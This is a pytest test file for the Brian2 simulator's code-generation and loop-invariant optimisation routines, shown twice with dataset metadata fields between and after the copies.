from collections import namedtuple import os import numpy as np import pytest from brian2 import prefs, clear_cache, _cache_dirs_and_extensions from brian2.codegen.cpp_prefs import compiler_supports_c99 from brian2.codegen.optimisation import optimise_statements from brian2.codegen.translation import (analyse_identifiers, get_identifiers_recursively, parse_statement, make_statements, ) from brian2.codegen.statements import Statement from brian2.codegen.codeobject import CodeObject from brian2.parsing.sympytools import str_to_sympy, sympy_to_str from brian2.core.variables import Subexpression, Variable, Constant, ArrayVariable from brian2.core.functions import Function, DEFAULT_FUNCTIONS, DEFAULT_CONSTANTS from brian2.devices.device import auto_target, device from brian2.units.fundamentalunits import Unit from brian2.units import second, ms FakeGroup = namedtuple('FakeGroup', ['variables']) @pytest.mark.codegen_independent def test_auto_target(): # very basic test that the "auto" codegen target is useable assert issubclass(auto_target(), CodeObject) @pytest.mark.codegen_independent def test_analyse_identifiers(): ''' Test that the analyse_identifiers function works on a simple clear example. ''' code = ''' a = b+c d = e+f ''' known = {'b': Variable(name='b'), 'c': Variable(name='c'), 'd': Variable(name='d'), 'g': Variable(name='g')} defined, used_known, dependent = analyse_identifiers(code, known) assert 'a' in defined # There might be an additional constant added by the # loop-invariant optimisation assert used_known == {'b', 'c', 'd'} assert dependent == {'e', 'f'} @pytest.mark.codegen_independent def test_get_identifiers_recursively(): ''' Test finding identifiers including subexpressions. ''' variables = {'sub1': Subexpression(name='sub1', dtype=np.float32, expr='sub2 * z', owner=FakeGroup(variables={}), device=None), 'sub2': Subexpression(name='sub2', dtype=np.float32, expr='5 + y', owner=FakeGroup(variables={}), device=None), 'x': Variable(name='x')} identifiers = get_identifiers_recursively(['_x = sub1 + x'], variables) assert identifiers == {'x', '_x', 'y', 'z', 'sub1', 'sub2'} @pytest.mark.codegen_independent def test_write_to_subexpression(): variables = { 'a': Subexpression(name='a', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='2*z'), 'z': Variable(name='z') } # Writing to a subexpression is not allowed code = 'a = z' with pytest.raises(SyntaxError): make_statements(code, variables, np.float32) @pytest.mark.codegen_independent def test_repeated_subexpressions(): variables = { 'a': Subexpression(name='a', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='2*z'), 'x': Variable(name='x'), 'y': Variable(name='y'), 'z': Variable(name='z') } # subexpression a (referring to z) is used twice, but can be reused the # second time (no change to z) code = ''' x = a y = a ''' scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 assert [stmt.var for stmt in vector_stmts] == ['a', 'x', 'y'] assert vector_stmts[0].constant code = ''' x = a z *= 2 ''' scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 assert [stmt.var for stmt in vector_stmts] == ['a', 'x', 'z'] # Note that we currently do not mark the subexpression as constant in this # case, because its use after the "z *=2" line would actually redefine it. # Our algorithm is currently not smart enough to detect that it is actually # not used afterwards # a refers to z, therefore we have to redefine a after z changed, and a # cannot be constant code = ''' x = a z *= 2 y = a ''' scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 assert [stmt.var for stmt in vector_stmts] == ['a', 'x', 'z', 'a', 'y'] assert not any(stmt.constant for stmt in vector_stmts) @pytest.mark.codegen_independent def test_nested_subexpressions(): ''' This test checks that code translation works with nested subexpressions. ''' code = ''' x = a + b + c c = 1 x = a + b + c d = 1 x = a + b + c ''' variables = { 'a': Subexpression(name='a', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='b*b+d'), 'b': Subexpression(name='b', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='c*c*c'), 'c': Variable(name='c'), 'd': Variable(name='d'), } scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 evalorder = ''.join(stmt.var for stmt in vector_stmts) # This is the order that variables ought to be evaluated in (note that # previously this test did not expect the last "b" evaluation, because its # value did not change (c was not changed). We have since removed this # subexpression caching, because it did not seem to apply in practical # use cases) assert evalorder == 'baxcbaxdbax' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation(): variables = {'v': Variable('v', scalar=False), 'w': Variable('w', scalar=False), 'dt': Constant('dt', dimensions=second.dim, value=0.1*ms), 'tau': Constant('tau', dimensions=second.dim, value=10*ms), 'exp': DEFAULT_FUNCTIONS['exp']} statements = [Statement('v', '=', 'dt*w*exp(-dt/tau)/tau + v*exp(-dt/tau)', '', np.float32), Statement('w', '=', 'w*exp(-dt/tau)', '', np.float32)] scalar, vector = optimise_statements([], statements, variables) # The optimisation should pull out at least exp(-dt / tau) assert len(scalar) >= 1 assert np.issubdtype(scalar[0].dtype, np.floating) assert scalar[0].var == '_lio_1' assert len(vector) == 2 assert all('_lio_' in stmt.expr for stmt in vector) @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_integer(): variables = {'v': Variable('v', scalar=False), 'N': Constant('N', 10), 'b': Variable('b', scalar=True, dtype=int), 'c': Variable('c', scalar=True, dtype=int), 'd': Variable('d', scalar=True, dtype=int), 'y': Variable('y', scalar=True, dtype=float), 'z': Variable('z', scalar=True, dtype=float), 'w': Variable('w', scalar=True, dtype=float), } statements = [Statement('v', '=', 'v % (2*3*N)', '', np.float32), # integer version doesn't get rewritten but float version does Statement('a', ':=', 'b//(c//d)', '', int), Statement('x', ':=', 'y/(z/w)', '', float), ] scalar, vector = optimise_statements([], statements, variables) assert len(scalar) == 3 assert np.issubdtype(scalar[0].dtype, np.signedinteger) assert scalar[0].var == '_lio_1' expr = scalar[0].expr.replace(' ', '') assert expr=='6*N' or expr=='N*6' assert np.issubdtype(scalar[1].dtype, np.signedinteger) assert scalar[1].var == '_lio_2' expr = scalar[1].expr.replace(' ', '') assert expr=='b//(c//d)' assert np.issubdtype(scalar[2].dtype, np.floating) assert scalar[2].var == '_lio_3' expr = scalar[2].expr.replace(' ', '') assert expr=='(y*w)/z' or expr=='(w*y)/z' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_boolean(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'N': Constant('N', 10), 'b': Variable('b', scalar=True, dtype=bool), 'c': Variable('c', scalar=True, dtype=bool), 'int': DEFAULT_FUNCTIONS['int'], 'foo': Function(lambda x: None, arg_units=[Unit(1)], return_unit=Unit(1), arg_types=['boolean'], return_type='float', stateless=False) } # The calls for "foo" cannot be pulled out, since foo is marked as stateful statements = [Statement('v1', '=', '1.0*int(b and c)', '', np.float32), Statement('v1', '=', '1.0*foo(b and c)', '', np.float32), Statement('v2', '=', 'int(not b and True)', '', np.float32), Statement('v2', '=', 'foo(not b and True)', '', np.float32) ] scalar, vector = optimise_statements([], statements, variables) assert len(scalar) == 4 assert scalar[0].expr == '1.0 * int(b and c)' assert scalar[1].expr == 'b and c' assert scalar[2].expr == 'int((not b) and True)' assert scalar[3].expr == '(not b) and True' assert len(vector) == 4 assert vector[0].expr == '_lio_1' assert vector[1].expr == 'foo(_lio_2)' assert vector[2].expr == '_lio_3' assert vector[3].expr == 'foo(_lio_4)' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_no_optimisation(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'N': Constant('N', 10), 's1': Variable('s1', scalar=True, dtype=float), 's2': Variable('s2', scalar=True, dtype=float), 'rand': DEFAULT_FUNCTIONS['rand'] } statements = [ # This hould not be simplified to 0! Statement('v1', '=', 'rand() - rand()', '', np.float), Statement('v1', '=', '3*rand() - 3*rand()', '', np.float), Statement('v1', '=', '3*rand() - ((1+2)*rand())', '', np.float), # This should not pull out rand()*N Statement('v1', '=', 's1*rand()*N', '', np.float), Statement('v1', '=', 's2*rand()*N', '', np.float), # This is not important mathematically, but it would change the numbers # that are generated Statement('v1', '=', '0*rand()*N', '', np.float), Statement('v1', '=', '0/rand()*N', '', np.float) ] scalar, vector = optimise_statements([], statements, variables) for vs in vector[:3]: assert vs.expr.count('rand()') == 2, 'Expression should still contain two rand() calls, but got ' + str(vs) for vs in vector[3:]: assert vs.expr.count('rand()') == 1, 'Expression should still contain a rand() call, but got ' + str(vs) @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_simplification(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'i1': Variable('i1', scalar=False, dtype=int), 'N': Constant('N', 10) } statements = [ # Should be simplified to 0.0 Statement('v1', '=', 'v1 - v1', '', np.float), Statement('v1', '=', 'N*v1 - N*v1', '', np.float), Statement('v1', '=', 'v1*N * 0', '', np.float), Statement('v1', '=', 'v1 * 0', '', np.float), Statement('v1', '=', 'v1 * 0.0', '', np.float), Statement('v1', '=', '0.0 / (v1*N)', '', np.float), # Should be simplified to 0 Statement('i1', '=', 'i1*N * 0', '', np.int), Statement('i1', '=', '0 * i1', '', np.int), Statement('i1', '=', '0 * i1*N', '', np.int), Statement('i1', '=', 'i1 * 0', '', np.int), # Should be simplified to v1*N Statement('v2', '=', '0 + v1*N', '', np.float), Statement('v2', '=', 'v1*N + 0.0', '', np.float), Statement('v2', '=', 'v1*N - 0', '', np.float), Statement('v2', '=', 'v1*N - 0.0', '', np.float), Statement('v2', '=', '1 * v1*N', '', np.float), Statement('v2', '=', '1.0 * v1*N', '', np.float), Statement('v2', '=', 'v1*N / 1.0', '', np.float), Statement('v2', '=', 'v1*N / 1', '', np.float), # Should be simplified to i1 Statement('i1', '=', 'i1*1', '', int), Statement('i1', '=', 'i1//1', '', int), Statement('i1', '=', 'i1+0', '', int), Statement('i1', '=', '0+i1', '', int), Statement('i1', '=', 'i1-0', '', int), # Should *not* be simplified (because it would change the type, # important for integer division, for example) Statement('v1', '=', 'i1*1.0', '', float), Statement('v1', '=', '1.0*i1', '', float), Statement('v1', '=', 'i1/1.0', '', float), Statement('v1', '=', 'i1/1', '', float), Statement('v1', '=', 'i1+0.0', '', float), Statement('v1', '=', '0.0+i1', '', float), Statement('v1', '=', 'i1-0.0', '', float), ## Should *not* be simplified, flooring division by 1 changes the value Statement('v1', '=', 'v2//1.0', '', float), Statement('i1', '=', 'i1//1.0', '', float) # changes type ] scalar, vector = optimise_statements([], statements, variables) assert len(scalar) == 0 for s in vector[:6]: assert s.expr == '0.0' for s in vector[6:10]: assert s.expr == '0', s.expr # integer for s in vector[10:18]: expr = s.expr.replace(' ', '') assert expr == 'v1*N' or expr == 'N*v1' for s in vector[18:23]: expr = s.expr.replace(' ', '') assert expr == 'i1' for s in vector[23:27]: expr = s.expr.replace(' ', '') assert expr == '1.0*i1' or expr == 'i1*1.0' or expr == 'i1/1.0' for s in vector[27:30]: expr = s.expr.replace(' ', '') assert expr == '0.0+i1' or expr == 'i1+0.0' for s in vector[30:31]: expr = s.expr.replace(' ', '') assert expr == 'v2//1.0' or expr == 'v2//1' for s in vector[31:]: expr = s.expr.replace(' ', '') assert expr == 'i1//1.0' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_constant_evaluation(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'i1': Variable('i1', scalar=False, dtype=int), 'N': Constant('N', 10), 's1': Variable('s1', scalar=True, dtype=float), 's2': Variable('s2', scalar=True, dtype=float), 'exp': DEFAULT_FUNCTIONS['exp'] } statements = [ Statement('v1', '=', 'v1 * (1 + 2 + 3)', '', np.float), Statement('v1', '=', 'exp(N)*v1', '', np.float), Statement('v1', '=', 'exp(0)*v1', '', np.float), ] scalar, vector = optimise_statements([], statements, variables) # exp(N) should be pulled out of the vector statements, the rest should be # evaluated in place assert len(scalar) == 1 assert scalar[0].expr == 'exp(N)' assert len(vector) == 3 expr = vector[0].expr.replace(' ', '') assert expr == '_lio_1*v1' or 'v1*_lio_1' expr = vector[1].expr.replace(' ', '') assert expr == '6.0*v1' or 'v1*6.0' assert vector[2].expr == 'v1' @pytest.mark.codegen_independent def test_automatic_augmented_assignments(): # We test that statements that could be rewritten as augmented assignments # are correctly rewritten (using sympy to test for symbolic equality) variables = { 'x': ArrayVariable('x', owner=None, size=10, device=device), 'y': ArrayVariable('y', owner=None, size=10, device=device), 'z': ArrayVariable('y', owner=None, size=10, device=device), 'b': ArrayVariable('b', owner=None, size=10, dtype=np.bool, device=device), 'clip': DEFAULT_FUNCTIONS['clip'], 'inf': DEFAULT_CONSTANTS['inf'] } statements = [ # examples that should be rewritten # Note that using our approach, we will never get -= or /= but always # the equivalent += or *= statements ('x = x + 1.0', 'x += 1.0'), ('x = 2.0 * x', 'x *= 2.0'), ('x = x - 3.0', 'x += -3.0'), ('x = x/2.0', 'x *= 0.5'), ('x = y + (x + 1.0)', 'x += y + 1.0'), ('x = x + x', 'x *= 2.0'), ('x = x + y + z', 'x += y + z'), ('x = x + y + z', 'x += y + z'), # examples that should not be rewritten ('x = 1.0/x', 'x = 1.0/x'), ('x = 1.0', 'x = 1.0'), ('x = 2.0*(x + 1.0)', 'x = 2.0*(x + 1.0)'), ('x = clip(x + y, 0.0, inf)', 'x = clip(x + y, 0.0, inf)'), ('b = b or False', 'b = b or False') ] for orig, rewritten in statements: scalar, vector = make_statements(orig, variables, np.float32) try: # we augment the assertion error with the original statement assert len(scalar) == 0, 'Did not expect any scalar statements but got ' + str(scalar) assert len(vector) == 1, 'Did expect a single statement but got ' + str(vector) statement = vector[0] expected_var, expected_op, expected_expr, _ = parse_statement(rewritten) assert expected_var == statement.var, 'expected write to variable %s, not to %s' % (expected_var, statement.var) assert expected_op == statement.op, 'expected operation %s, not %s' % (expected_op, statement.op) # Compare the two expressions using sympy to allow for different order etc. sympy_expected = str_to_sympy(expected_expr) sympy_actual = str_to_sympy(statement.expr) assert sympy_expected == sympy_actual, ('RHS expressions "%s" and "%s" are not identical' % (sympy_to_str(sympy_expected), sympy_to_str(sympy_actual))) except AssertionError as ex: raise AssertionError('Transformation for statement "%s" gave an unexpected result: %s' % (orig, str(ex))) def test_clear_cache(): target = prefs.codegen.target if target == 'numpy': assert 'numpy' not in _cache_dirs_and_extensions with pytest.raises(ValueError): clear_cache('numpy') else: assert target in _cache_dirs_and_extensions cache_dir, _ = _cache_dirs_and_extensions[target] # Create a file that should not be there fname = os.path.join(cache_dir, 'some_file.py') open(fname, 'w').close() # clear_cache should refuse to clear the directory with pytest.raises(IOError): clear_cache(target) os.remove(fname) def test_compiler_c99(): # On a user's computer, we do not know whether the compiler actually # has C99 support, so we just check whether the test does not raise an # error c99_support = compiler_supports_c99() # On our Azure test server we know that the compilers support C99 if os.environ.get('AGENT_OS', ''): assert c99_support if __name__ == '__main__': test_auto_target() test_analyse_identifiers() test_get_identifiers_recursively() test_write_to_subexpression() test_repeated_subexpressions() test_nested_subexpressions() test_apply_loop_invariant_optimisation() test_apply_loop_invariant_optimisation_integer() test_apply_loop_invariant_optimisation_boolean() test_apply_loop_invariant_optimisation_no_optimisation() test_apply_loop_invariant_optimisation_simplification() test_apply_loop_invariant_optimisation_constant_evaluation() test_automatic_augmented_assignments() test_clear_cache()
43.316348
134
0.558181
from collections import namedtuple import os import numpy as np import pytest from brian2 import prefs, clear_cache, _cache_dirs_and_extensions from brian2.codegen.cpp_prefs import compiler_supports_c99 from brian2.codegen.optimisation import optimise_statements from brian2.codegen.translation import (analyse_identifiers, get_identifiers_recursively, parse_statement, make_statements, ) from brian2.codegen.statements import Statement from brian2.codegen.codeobject import CodeObject from brian2.parsing.sympytools import str_to_sympy, sympy_to_str from brian2.core.variables import Subexpression, Variable, Constant, ArrayVariable from brian2.core.functions import Function, DEFAULT_FUNCTIONS, DEFAULT_CONSTANTS from brian2.devices.device import auto_target, device from brian2.units.fundamentalunits import Unit from brian2.units import second, ms FakeGroup = namedtuple('FakeGroup', ['variables']) @pytest.mark.codegen_independent def test_auto_target(): assert issubclass(auto_target(), CodeObject) @pytest.mark.codegen_independent def test_analyse_identifiers(): code = ''' a = b+c d = e+f ''' known = {'b': Variable(name='b'), 'c': Variable(name='c'), 'd': Variable(name='d'), 'g': Variable(name='g')} defined, used_known, dependent = analyse_identifiers(code, known) assert 'a' in defined assert used_known == {'b', 'c', 'd'} assert dependent == {'e', 'f'} @pytest.mark.codegen_independent def test_get_identifiers_recursively(): variables = {'sub1': Subexpression(name='sub1', dtype=np.float32, expr='sub2 * z', owner=FakeGroup(variables={}), device=None), 'sub2': Subexpression(name='sub2', dtype=np.float32, expr='5 + y', owner=FakeGroup(variables={}), device=None), 'x': Variable(name='x')} identifiers = get_identifiers_recursively(['_x = sub1 + x'], variables) assert identifiers == {'x', '_x', 'y', 'z', 'sub1', 'sub2'} @pytest.mark.codegen_independent def test_write_to_subexpression(): variables = { 'a': Subexpression(name='a', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='2*z'), 'z': Variable(name='z') } code = 'a = z' with pytest.raises(SyntaxError): make_statements(code, variables, np.float32) @pytest.mark.codegen_independent def test_repeated_subexpressions(): variables = { 'a': Subexpression(name='a', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='2*z'), 'x': Variable(name='x'), 'y': Variable(name='y'), 'z': Variable(name='z') } code = ''' x = a y = a ''' scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 assert [stmt.var for stmt in vector_stmts] == ['a', 'x', 'y'] assert vector_stmts[0].constant code = ''' x = a z *= 2 ''' scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 assert [stmt.var for stmt in vector_stmts] == ['a', 'x', 'z'] code = ''' x = a z *= 2 y = a ''' scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 assert [stmt.var for stmt in vector_stmts] == ['a', 'x', 'z', 'a', 'y'] assert not any(stmt.constant for stmt in vector_stmts) @pytest.mark.codegen_independent def test_nested_subexpressions(): code = ''' x = a + b + c c = 1 x = a + b + c d = 1 x = a + b + c ''' variables = { 'a': Subexpression(name='a', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='b*b+d'), 'b': Subexpression(name='b', dtype=np.float32, owner=FakeGroup(variables={}), device=None, expr='c*c*c'), 'c': Variable(name='c'), 'd': Variable(name='d'), } scalar_stmts, vector_stmts = make_statements(code, variables, np.float32) assert len(scalar_stmts) == 0 evalorder = ''.join(stmt.var for stmt in vector_stmts) assert evalorder == 'baxcbaxdbax' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation(): variables = {'v': Variable('v', scalar=False), 'w': Variable('w', scalar=False), 'dt': Constant('dt', dimensions=second.dim, value=0.1*ms), 'tau': Constant('tau', dimensions=second.dim, value=10*ms), 'exp': DEFAULT_FUNCTIONS['exp']} statements = [Statement('v', '=', 'dt*w*exp(-dt/tau)/tau + v*exp(-dt/tau)', '', np.float32), Statement('w', '=', 'w*exp(-dt/tau)', '', np.float32)] scalar, vector = optimise_statements([], statements, variables) assert len(scalar) >= 1 assert np.issubdtype(scalar[0].dtype, np.floating) assert scalar[0].var == '_lio_1' assert len(vector) == 2 assert all('_lio_' in stmt.expr for stmt in vector) @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_integer(): variables = {'v': Variable('v', scalar=False), 'N': Constant('N', 10), 'b': Variable('b', scalar=True, dtype=int), 'c': Variable('c', scalar=True, dtype=int), 'd': Variable('d', scalar=True, dtype=int), 'y': Variable('y', scalar=True, dtype=float), 'z': Variable('z', scalar=True, dtype=float), 'w': Variable('w', scalar=True, dtype=float), } statements = [Statement('v', '=', 'v % (2*3*N)', '', np.float32), Statement('a', ':=', 'b//(c//d)', '', int), Statement('x', ':=', 'y/(z/w)', '', float), ] scalar, vector = optimise_statements([], statements, variables) assert len(scalar) == 3 assert np.issubdtype(scalar[0].dtype, np.signedinteger) assert scalar[0].var == '_lio_1' expr = scalar[0].expr.replace(' ', '') assert expr=='6*N' or expr=='N*6' assert np.issubdtype(scalar[1].dtype, np.signedinteger) assert scalar[1].var == '_lio_2' expr = scalar[1].expr.replace(' ', '') assert expr=='b//(c//d)' assert np.issubdtype(scalar[2].dtype, np.floating) assert scalar[2].var == '_lio_3' expr = scalar[2].expr.replace(' ', '') assert expr=='(y*w)/z' or expr=='(w*y)/z' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_boolean(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'N': Constant('N', 10), 'b': Variable('b', scalar=True, dtype=bool), 'c': Variable('c', scalar=True, dtype=bool), 'int': DEFAULT_FUNCTIONS['int'], 'foo': Function(lambda x: None, arg_units=[Unit(1)], return_unit=Unit(1), arg_types=['boolean'], return_type='float', stateless=False) } # The calls for "foo" cannot be pulled out, since foo is marked as stateful statements = [Statement('v1', '=', '1.0*int(b and c)', '', np.float32), Statement('v1', '=', '1.0*foo(b and c)', '', np.float32), Statement('v2', '=', 'int(not b and True)', '', np.float32), Statement('v2', '=', 'foo(not b and True)', '', np.float32) ] scalar, vector = optimise_statements([], statements, variables) assert len(scalar) == 4 assert scalar[0].expr == '1.0 * int(b and c)' assert scalar[1].expr == 'b and c' assert scalar[2].expr == 'int((not b) and True)' assert scalar[3].expr == '(not b) and True' assert len(vector) == 4 assert vector[0].expr == '_lio_1' assert vector[1].expr == 'foo(_lio_2)' assert vector[2].expr == '_lio_3' assert vector[3].expr == 'foo(_lio_4)' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_no_optimisation(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'N': Constant('N', 10), 's1': Variable('s1', scalar=True, dtype=float), 's2': Variable('s2', scalar=True, dtype=float), 'rand': DEFAULT_FUNCTIONS['rand'] } statements = [ # This hould not be simplified to 0! Statement('v1', '=', 'rand() - rand()', '', np.float), Statement('v1', '=', '3*rand() - 3*rand()', '', np.float), Statement('v1', '=', '3*rand() - ((1+2)*rand())', '', np.float), # This should not pull out rand()*N Statement('v1', '=', 's1*rand()*N', '', np.float), Statement('v1', '=', 's2*rand()*N', '', np.float), # This is not important mathematically, but it would change the numbers # that are generated Statement('v1', '=', '0*rand()*N', '', np.float), Statement('v1', '=', '0/rand()*N', '', np.float) ] scalar, vector = optimise_statements([], statements, variables) for vs in vector[:3]: assert vs.expr.count('rand()') == 2, 'Expression should still contain two rand() calls, but got ' + str(vs) for vs in vector[3:]: assert vs.expr.count('rand()') == 1, 'Expression should still contain a rand() call, but got ' + str(vs) @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_simplification(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'i1': Variable('i1', scalar=False, dtype=int), 'N': Constant('N', 10) } statements = [ # Should be simplified to 0.0 Statement('v1', '=', 'v1 - v1', '', np.float), Statement('v1', '=', 'N*v1 - N*v1', '', np.float), Statement('v1', '=', 'v1*N * 0', '', np.float), Statement('v1', '=', 'v1 * 0', '', np.float), Statement('v1', '=', 'v1 * 0.0', '', np.float), Statement('v1', '=', '0.0 / (v1*N)', '', np.float), # Should be simplified to 0 Statement('i1', '=', 'i1*N * 0', '', np.int), Statement('i1', '=', '0 * i1', '', np.int), Statement('i1', '=', '0 * i1*N', '', np.int), Statement('i1', '=', 'i1 * 0', '', np.int), # Should be simplified to v1*N Statement('v2', '=', '0 + v1*N', '', np.float), Statement('v2', '=', 'v1*N + 0.0', '', np.float), Statement('v2', '=', 'v1*N - 0', '', np.float), Statement('v2', '=', 'v1*N - 0.0', '', np.float), Statement('v2', '=', '1 * v1*N', '', np.float), Statement('v2', '=', '1.0 * v1*N', '', np.float), Statement('v2', '=', 'v1*N / 1.0', '', np.float), Statement('v2', '=', 'v1*N / 1', '', np.float), # Should be simplified to i1 Statement('i1', '=', 'i1*1', '', int), Statement('i1', '=', 'i1//1', '', int), Statement('i1', '=', 'i1+0', '', int), Statement('i1', '=', '0+i1', '', int), Statement('i1', '=', 'i1-0', '', int), # Should *not* be simplified (because it would change the type, # important for integer division, for example) Statement('v1', '=', 'i1*1.0', '', float), Statement('v1', '=', '1.0*i1', '', float), Statement('v1', '=', 'i1/1.0', '', float), Statement('v1', '=', 'i1/1', '', float), Statement('v1', '=', 'i1+0.0', '', float), Statement('v1', '=', '0.0+i1', '', float), Statement('v1', '=', 'i1-0.0', '', float), ## Should *not* be simplified, flooring division by 1 changes the value Statement('v1', '=', 'v2//1.0', '', float), Statement('i1', '=', 'i1//1.0', '', float) # changes type ] scalar, vector = optimise_statements([], statements, variables) assert len(scalar) == 0 for s in vector[:6]: assert s.expr == '0.0' for s in vector[6:10]: assert s.expr == '0', s.expr # integer for s in vector[10:18]: expr = s.expr.replace(' ', '') assert expr == 'v1*N' or expr == 'N*v1' for s in vector[18:23]: expr = s.expr.replace(' ', '') assert expr == 'i1' for s in vector[23:27]: expr = s.expr.replace(' ', '') assert expr == '1.0*i1' or expr == 'i1*1.0' or expr == 'i1/1.0' for s in vector[27:30]: expr = s.expr.replace(' ', '') assert expr == '0.0+i1' or expr == 'i1+0.0' for s in vector[30:31]: expr = s.expr.replace(' ', '') assert expr == 'v2//1.0' or expr == 'v2//1' for s in vector[31:]: expr = s.expr.replace(' ', '') assert expr == 'i1//1.0' @pytest.mark.codegen_independent def test_apply_loop_invariant_optimisation_constant_evaluation(): variables = {'v1': Variable('v1', scalar=False), 'v2': Variable('v2', scalar=False), 'i1': Variable('i1', scalar=False, dtype=int), 'N': Constant('N', 10), 's1': Variable('s1', scalar=True, dtype=float), 's2': Variable('s2', scalar=True, dtype=float), 'exp': DEFAULT_FUNCTIONS['exp'] } statements = [ Statement('v1', '=', 'v1 * (1 + 2 + 3)', '', np.float), Statement('v1', '=', 'exp(N)*v1', '', np.float), Statement('v1', '=', 'exp(0)*v1', '', np.float), ] scalar, vector = optimise_statements([], statements, variables) # exp(N) should be pulled out of the vector statements, the rest should be # evaluated in place assert len(scalar) == 1 assert scalar[0].expr == 'exp(N)' assert len(vector) == 3 expr = vector[0].expr.replace(' ', '') assert expr == '_lio_1*v1' or 'v1*_lio_1' expr = vector[1].expr.replace(' ', '') assert expr == '6.0*v1' or 'v1*6.0' assert vector[2].expr == 'v1' @pytest.mark.codegen_independent def test_automatic_augmented_assignments(): # We test that statements that could be rewritten as augmented assignments # are correctly rewritten (using sympy to test for symbolic equality) variables = { 'x': ArrayVariable('x', owner=None, size=10, device=device), 'y': ArrayVariable('y', owner=None, size=10, device=device), 'z': ArrayVariable('y', owner=None, size=10, device=device), 'b': ArrayVariable('b', owner=None, size=10, dtype=np.bool, device=device), 'clip': DEFAULT_FUNCTIONS['clip'], 'inf': DEFAULT_CONSTANTS['inf'] } statements = [ # examples that should be rewritten # Note that using our approach, we will never get -= or /= but always # the equivalent += or *= statements ('x = x + 1.0', 'x += 1.0'), ('x = 2.0 * x', 'x *= 2.0'), ('x = x - 3.0', 'x += -3.0'), ('x = x/2.0', 'x *= 0.5'), ('x = y + (x + 1.0)', 'x += y + 1.0'), ('x = x + x', 'x *= 2.0'), ('x = x + y + z', 'x += y + z'), ('x = x + y + z', 'x += y + z'), # examples that should not be rewritten ('x = 1.0/x', 'x = 1.0/x'), ('x = 1.0', 'x = 1.0'), ('x = 2.0*(x + 1.0)', 'x = 2.0*(x + 1.0)'), ('x = clip(x + y, 0.0, inf)', 'x = clip(x + y, 0.0, inf)'), ('b = b or False', 'b = b or False') ] for orig, rewritten in statements: scalar, vector = make_statements(orig, variables, np.float32) try: # we augment the assertion error with the original statement assert len(scalar) == 0, 'Did not expect any scalar statements but got ' + str(scalar) assert len(vector) == 1, 'Did expect a single statement but got ' + str(vector) statement = vector[0] expected_var, expected_op, expected_expr, _ = parse_statement(rewritten) assert expected_var == statement.var, 'expected write to variable %s, not to %s' % (expected_var, statement.var) assert expected_op == statement.op, 'expected operation %s, not %s' % (expected_op, statement.op) # Compare the two expressions using sympy to allow for different order etc. sympy_expected = str_to_sympy(expected_expr) sympy_actual = str_to_sympy(statement.expr) assert sympy_expected == sympy_actual, ('RHS expressions "%s" and "%s" are not identical' % (sympy_to_str(sympy_expected), sympy_to_str(sympy_actual))) except AssertionError as ex: raise AssertionError('Transformation for statement "%s" gave an unexpected result: %s' % (orig, str(ex))) def test_clear_cache(): target = prefs.codegen.target if target == 'numpy': assert 'numpy' not in _cache_dirs_and_extensions with pytest.raises(ValueError): clear_cache('numpy') else: assert target in _cache_dirs_and_extensions cache_dir, _ = _cache_dirs_and_extensions[target] # Create a file that should not be there fname = os.path.join(cache_dir, 'some_file.py') open(fname, 'w').close() # clear_cache should refuse to clear the directory with pytest.raises(IOError): clear_cache(target) os.remove(fname) def test_compiler_c99(): # On a user's computer, we do not know whether the compiler actually c99_support = compiler_supports_c99() if os.environ.get('AGENT_OS', ''): assert c99_support if __name__ == '__main__': test_auto_target() test_analyse_identifiers() test_get_identifiers_recursively() test_write_to_subexpression() test_repeated_subexpressions() test_nested_subexpressions() test_apply_loop_invariant_optimisation() test_apply_loop_invariant_optimisation_integer() test_apply_loop_invariant_optimisation_boolean() test_apply_loop_invariant_optimisation_no_optimisation() test_apply_loop_invariant_optimisation_simplification() test_apply_loop_invariant_optimisation_constant_evaluation() test_automatic_augmented_assignments() test_clear_cache()
true
true
f728f8df92eb60ed7b875c23517e93444c46346a
5,568
py
Python
a_other/runner_threading.py
ogorodnikov/m1
06aee1963471897d8c05986e2782e3ca3a107c93
[ "MIT" ]
null
null
null
a_other/runner_threading.py
ogorodnikov/m1
06aee1963471897d8c05986e2782e3ca3a107c93
[ "MIT" ]
null
null
null
a_other/runner_threading.py
ogorodnikov/m1
06aee1963471897d8c05986e2782e3ca3a107c93
[ "MIT" ]
null
null
null
